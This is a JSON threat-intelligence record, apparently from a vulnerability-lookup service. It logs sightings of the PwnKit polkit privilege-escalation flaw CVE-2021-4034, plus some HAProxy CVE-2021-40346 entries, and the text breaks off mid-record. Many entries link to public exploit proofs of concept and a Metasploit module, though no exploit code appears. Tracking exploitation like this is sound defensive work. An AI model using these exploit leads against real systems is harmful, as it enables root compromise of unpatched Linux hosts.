{"vulnerability": "CVE-2021-4034", "sightings": [{"uuid": "52fe8822-fd4d-471d-b750-3fdd18bda091", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "4e8bddac-d90c-43c2-80c3-cdda7745af31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "MISP/ad5af8e7-0c4c-4b64-b36d-1c80910c1140", "content": "", "creation_timestamp": "2023-06-23T06:24:08.000000Z"}, {"uuid": "c788c78f-3063-433a-9a98-18ed5fcaf756", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "MISP/22f9f278-2341-4bf2-af91-b31198e4dc11", "content": "", "creation_timestamp": "2024-02-09T06:40:03.000000Z"}, {"uuid": "d108d4fc-44ce-4c9d-b384-e36dd0447b37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971669", "content": "", "creation_timestamp": "2024-12-24T20:32:35.045010Z"}, {"uuid": "5b36d567-5755-4e94-8aa4-6dfffa5881b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-45ff02b8-52616ac586aa8672", "content": "", "creation_timestamp": "2025-01-17T13:35:06.745465Z"}, {"uuid": "72926cfa-c087-4d40-b356-fcb8c20f2b8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "123c0e11-a3fd-4d84-82ba-b490be5b9027", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://infosec.exchange/users/malmoeb/statuses/114251513483346084", "content": "", "creation_timestamp": "2025-03-30T13:02:25.468981Z"}, {"uuid": "6a5cbe0b-8ed8-48dd-975e-e012138dead0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://infosec.exchange/users/malmoeb/statuses/114251513483346084", "content": "", "creation_timestamp": "2025-03-30T13:02:25.476600Z"}, {"uuid": "771ef261-d47c-49f9-b35d-810aa5de3f32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/malmoeb.bsky.social/post/3lllvr7bvps2s", "content": "", "creation_timestamp": "2025-03-30T13:03:39.000340Z"}, {"uuid": "fd6292e7-9709-41c0-8e81-da3bfbd09cf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/malmoeb.bsky.social/post/3lllvr7c3lc2s", "content": "", "creation_timestamp": "2025-03-30T13:03:40.020048Z"}, {"uuid": "9deede31-4649-4924-a214-c10e124b8862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/malmoeb.bsky.social/post/3lllvr7c3ld2s", "content": "", "creation_timestamp": "2025-03-30T13:03:41.006687Z"}, {"uuid": "0073c056-9527-43d9-95ca-336ad6e630f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/malmoeb.bsky.social/post/3lllvr7c4kl2s", "content": "", "creation_timestamp": "2025-03-30T13:03:42.046058Z"}, {"uuid": "6e92ebbf-6740-468b-b4d4-751c04ef956d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/zxqa.bsky.social/post/3lgmcnbrbns2o", "content": "", "creation_timestamp": "2025-01-26T01:48:05.300955Z"}, {"uuid": "0f38c0a3-cc16-4892-a798-955b0e09969e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/zxqa.bsky.social/post/3lgmcnbrrbs2o", "content": "", "creation_timestamp": "2025-01-26T01:48:05.746073Z"}, {"uuid": "6a59f5c9-f81b-49ab-8cd6-9539a7d94178", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/zxqa.bsky.social/post/3lgmcnbrw622o", "content": "", "creation_timestamp": "2025-01-26T01:48:06.227576Z"}, {"uuid": "77e95346-75a2-4294-8d6f-02cb4375d6e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llp562uepu2u", "content": "", "creation_timestamp": "2025-03-31T19:54:01.908291Z"}, {"uuid": "6f8f4895-0b34-4173-b8b7-21899be35f82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:40.000000Z"}, {"uuid": "e116e755-b69c-4479-8b87-e4d66fa5db5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://gist.github.com/shashinma/4d29c803ec30066d2b1178820b10c7fc", "content": "", "creation_timestamp": "2025-02-11T07:01:30.000000Z"}, {"uuid": "03c9dbd5-7bc2-4dde-a6cb-3bd6c5e7361b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:31.000000Z"}, {"uuid": "1e0c0e50-7c5d-4977-b7bf-8d676bb70e3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://gist.github.com/aydinnyunus/42ab4df2fd363d3566b97d09e09fcac6", "content": "", "creation_timestamp": "2025-03-27T14:02:22.000000Z"}, {"uuid": "68f01690-b718-4f32-bb09-3d69ac994c08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lwxg5kfkh32p", "content": "", "creation_timestamp": "2025-08-22T02:33:14.094339Z"}, {"uuid": "9ac9a191-5b89-4ca2-8ac3-8f61f9e64b08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/steceroni.bsky.social/post/3lmwpbprnpq2w", "content": "", "creation_timestamp": "2025-04-16T13:32:03.668186Z"}, {"uuid": "daea22d8-682c-451a-97d5-2ed6273dd71c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lvifqhzntc2c", "content": "", "creation_timestamp": "2025-08-03T09:50:54.391846Z"}, {"uuid": "3e08c6d6-d52a-4537-93f7-bff1e1d6e679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://gist.github.com/ankush-kaura/a059d2c9cb733598fbc1c12df1956435", "content": "", "creation_timestamp": "2025-07-16T04:34:32.000000Z"}, {"uuid": "2ee98f27-b264-4dad-913c-1b6a52f2158c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://gist.github.com/strikoder/c540a4babb01307960dd6a30f822077c", "content": "", "creation_timestamp": "2025-11-23T18:56:16.000000Z"}, {"uuid": "b77aea15-592f-4bf7-852a-8d032b74223d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://gist.github.com/garagon/a8d92972c465aaeac354cd11668e409a", "content": "", "creation_timestamp": "2026-02-17T13:27:41.000000Z"}, {"uuid": "6cf74947-129a-4f07-a7d1-9d17475df82c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb", "content": "", "creation_timestamp": "2022-03-03T14:43:22.000000Z"}, {"uuid": "fa129aac-fe89-4693-b8fc-f4a83a0c5bde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "MISP/ca7dfd4e-d0b5-4d10-8982-36d9f6e53c8e", "content": "", "creation_timestamp": "2025-09-01T13:53:38.000000Z"}, {"uuid": "5b8b1a80-12a0-4abb-b9a4-e66a48b470a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:00:56.000000Z"}, {"uuid": "854919a3-17a6-440c-842a-5e1b42d5370c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-4034", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/518ac670-b61f-4ca6-97e4-1e8262566fc6", "content": "", "creation_timestamp": "2026-02-02T12:27:19.449059Z"}, {"uuid": "e2fefd96-d0c3-4a49-836c-56bdad521d6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_2/2022", "content": "", "creation_timestamp": "2022-01-26T11:29:39.000000Z"}, {"uuid": "8c6f3f30-26b0-4e3c-b2c4-f86bfccf0ece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=728", "content": "", "creation_timestamp": "2022-01-27T04:00:00.000000Z"}, {"uuid": "81a1cb66-274e-4b0e-b45c-f19235fcbc6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/610", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-40346 integer overflow enables http smuggling\nURL\uff1ahttps://github.com/donky16/CVE-2021-40346-POC", "creation_timestamp": "2021-09-28T08:32:41.000000Z"}, {"uuid": "245be012-86a0-4f86-ad8b-4a77a406b62a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/_Cdt-RXJGXlSjrZCIGXjSI4Y-FrkkKAKryswtB5YyesQpYk", "content": "", "creation_timestamp": "2025-06-13T09:00:04.000000Z"}, {"uuid": "ea294850-dae9-46bb-9222-d90fee195939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1421", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPython exploit for CVE-2021-4034\nURL\uff1ahttps://github.com/Plethore/CVE-2021-4034", "creation_timestamp": "2022-01-27T10:24:36.000000Z"}, {"uuid": "8b2f7888-6c18-4125-9ba4-187147290fe2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7339", "content": "\u25a0\u25a1\u25a1\u25a1\u25a1 https://github.com/donky16/CVE-2021-40346-POC", "creation_timestamp": "2021-09-28T13:20:27.000000Z"}, {"uuid": "6c67d538-b6a8-4813-8fb5-45cd833ae6b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7050", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 CVE-2021-40346 PoC (HAProxy HTTP Smuggling).\n\nhttps://github.com/knqyf263/CVE-2021-40346", "creation_timestamp": "2021-09-12T04:50:48.000000Z"}, {"uuid": "9835e751-d7f5-474a-b5df-2b21438f9996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/826", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aHAProxy CVE-2021-40346\nURL\uff1ahttps://github.com/Vulnmachines/HAProxy_CVE-2021-40346", "creation_timestamp": "2021-11-08T11:58:01.000000Z"}, {"uuid": "e7466a1b-ac10-4848-b1ae-46318ce54914", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/cKure/6998", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling\n\nhttps://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/", "creation_timestamp": "2021-09-08T20:55:22.000000Z"}, {"uuid": "205392cf-c0e6-42a8-8faa-d6f837abfc50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1409", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPython exploit code for CVE-2021-4034 (pwnkit)\nURL\uff1ahttps://github.com/Anonymous-Family/CVE-2021-4034", "creation_timestamp": "2022-01-26T18:55:54.000000Z"}, {"uuid": "df3c8d5f-5be6-4040-8a74-b5ff797c2690", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1408", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPython exploit code for CVE-2021-4034 (pwnkit)\nURL\uff1ahttps://github.com/joeammond/CVE-2021-4034", "creation_timestamp": "2022-01-26T18:04:02.000000Z"}, {"uuid": "2055bf23-d912-4695-96f3-2a7871523696", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1472", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aa python script that downloads neofetch and traitor and attempts to exploit CVE-2021-4034\nURL\uff1ahttps://github.com/Ph4nt0mh4x0r/auto-CVE-2021-4034", "creation_timestamp": "2022-02-03T19:07:29.000000Z"}, {"uuid": "b1dab71d-2d96-4788-9478-ea74b6a8e109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1426", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aProof of Concept for CVE-2021-4034\nURL\uff1ahttps://github.com/DosAmp/pkwned", "creation_timestamp": "2022-01-27T14:51:47.000000Z"}, {"uuid": "8f92265d-27c6-4f41-ae80-f678af7664fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1425", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034 PoC , polkit < 0.120\nURL\uff1ahttps://github.com/tahaafarooq/poppy", "creation_timestamp": "2022-01-27T14:34:29.000000Z"}, {"uuid": "c110d612-cc5a-40cf-a98d-30d260f3b85d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1462", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPwnkit CVE-2021-4034\nURL\uff1ahttps://github.com/scent2d/PoC-CVE-2021-4034", "creation_timestamp": "2022-02-01T12:16:11.000000Z"}, {"uuid": "f2208e3f-8ecf-40bb-b6ca-8e90802f2d82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1413", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA simple proof-of-concept for CVE-2021-4034 (pkexec local privilege escalation)\nURL\uff1ahttps://github.com/cd80-ctf/CVE-2021-4034", "creation_timestamp": "2022-01-27T01:17:13.000000Z"}, {"uuid": "ad0f2456-43da-4557-accb-39078af1f546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1389", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit\u2019s pkexec (CVE-2021-4034)\nURL\uff1ahttps://github.com/arthepsy/CVE-2021-4034", "creation_timestamp": "2022-01-26T01:07:09.000000Z"}, {"uuid": "12218b4b-7301-44cf-a89f-c76ec850504e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1422", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLSM BPF module to block pwnkit (CVE-2021-4034) like exploits\nURL\uff1ahttps://github.com/evdenis/lsm_bpf_check_argc0", "creation_timestamp": "2022-01-27T10:28:46.000000Z"}, {"uuid": "6c9a0347-c6a4-46a1-8348-a2b8e90c54d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "Telegram/ODkEtYJcdodoymnai69skLvMcFHtNm29FdF-bCCuyxxZw0M", "content": "", "creation_timestamp": "2022-01-26T15:50:51.000000Z"}, {"uuid": "4b208519-a286-4b26-bc2b-dbe6a4a21c7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1436", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1avulnerable setup to display an attack chain of log4j CVE-2021-44228 with privilege escalation to root using the polkit exploit CVE-2021-4034\nURL\uff1ahttps://github.com/0xalwayslucky/log4j-polkit-poc", "creation_timestamp": "2022-01-28T12:55:39.000000Z"}, {"uuid": "a7129fb5-c933-45bb-9fc8-c195305e33e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8675", "content": "Zero-Day: A vulnerability in Polkit's pkexec component identified as CVE-2021-4034 (PwnKit) is present in the default configuration of all major Linux distributions and can be exploited to gain full root privileges on the system, researchers warn today.\n\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034\n\nhttps://www.bleepingcomputer.com/news/security/linux-system-service-bug-gives-root-on-all-major-distros-exploit-released/", "creation_timestamp": "2022-01-26T16:56:22.000000Z"}, {"uuid": "fb0d2b91-ab2d-4a61-9306-adc7501ab5ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1394", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept\nURL\uff1ahttps://github.com/mebeim/CVE-2021-4034", "creation_timestamp": "2022-01-26T03:59:15.000000Z"}, {"uuid": "3b746b9c-faf4-4610-a256-63476d04b8be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1393", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploit for CVE-2021-4034\nURL\uff1ahttps://github.com/Ayrx/CVE-2021-4034", "creation_timestamp": "2022-01-26T03:46:16.000000Z"}, {"uuid": "ce6fdae6-fba2-4500-8ab1-3213744d15fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1392", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034\nURL\uff1ahttps://github.com/signfind/CVE-2021-4034", "creation_timestamp": "2022-01-26T02:24:17.000000Z"}, {"uuid": "0c36cdfa-aca6-492c-a98e-759be648b2ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1391", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC for CVE-2021-4034\nURL\uff1ahttps://github.com/nikaiw/CVE-2021-4034", "creation_timestamp": "2022-01-26T02:07:12.000000Z"}, {"uuid": "1364eb85-91f1-47cc-b98b-c8fa59b01849", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1398", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDirty PoC for CVE-2021-4034 (Pwnkit)\nURL\uff1ahttps://github.com/Nero22k/CVE-2021-4034", "creation_timestamp": "2022-01-26T10:26:10.000000Z"}, {"uuid": "37a0077f-edd6-4b16-b54b-1634dcd978f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1401", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPseudopatch for CVE-2021-4034\nURL\uff1ahttps://github.com/moldabekov/CVE-2021-4034", "creation_timestamp": "2022-01-26T11:22:24.000000Z"}, {"uuid": "7945b8e0-115d-4022-aa5c-6d47db29bd99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1400", "content": 